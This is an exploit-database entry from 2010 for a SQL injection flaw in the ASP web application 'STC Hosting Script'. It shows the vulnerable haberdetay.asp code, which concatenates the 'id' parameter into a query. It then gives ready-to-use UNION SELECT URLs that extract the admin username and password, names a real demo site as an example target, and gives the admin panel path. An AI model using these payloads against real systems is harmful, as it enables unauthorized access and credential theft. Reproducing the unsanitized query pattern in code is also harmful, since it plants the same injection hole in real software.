STC Hosting Script (id) Remote SQL Injection Vulnerability

2010-08-15T00:00:00
ID 1337DAY-ID-13705
Type zdt
Reporter KnocKout
Modified 2010-08-15T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ==========================================================
STC Hosting Script (id) Remote SQL Injection Vulnerability
==========================================================

########################################################
Author : KnocKout
Thankz.: DaiMon,Equivalent
Contact: [email protected]
#########################################################
Script Name : STC Hosting Script
Script Download : http://aspindir.com/goster/6064
Vulnerable Style : SQL Injection
########################################################

Vulnerable file in haberdetay.asp

#############Error Code###############################

<!-- #include file="baglan.asp"-->
<%
id = Request.QueryString("id")
Set haberdetay = Server.CreateObject("Adodb.recordset")
Sql= "Select * From haberler where id="&id
haberdetay.open sql,Fatih,1,3
%>

<%=haberdetay("icerik")%>
<title><%=haberdetay("baslik")%></title>

####################################################
!
Inj3ct Code : -1%20union%20select%200,1,2,[DATA]%20from%20{TABLE]%20where+id=1
!
(Admin username): http://target/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_adi%20from%20ayarlar%20where+id=1
(Admin password): http://target/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_sifre%20from%20ayarlar%20where+id=1
?
!
Example Attack : 
http://www.sanalturkey.com/demo/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_adi%20from%20ayarlar%20where+id=1
http://www.sanalturkey.com/demo/haberdetay.asp?id=-1%20union%20select%200,1,2,admin_sifre%20from%20ayarlar%20where+id=1

Admin Path : http://target/yonetici
####################################################
Special Thanks Inj3ct0r Exploit DataBase
I Love you Inj3ct0r.Com



#  0day.today [2018-03-19]  #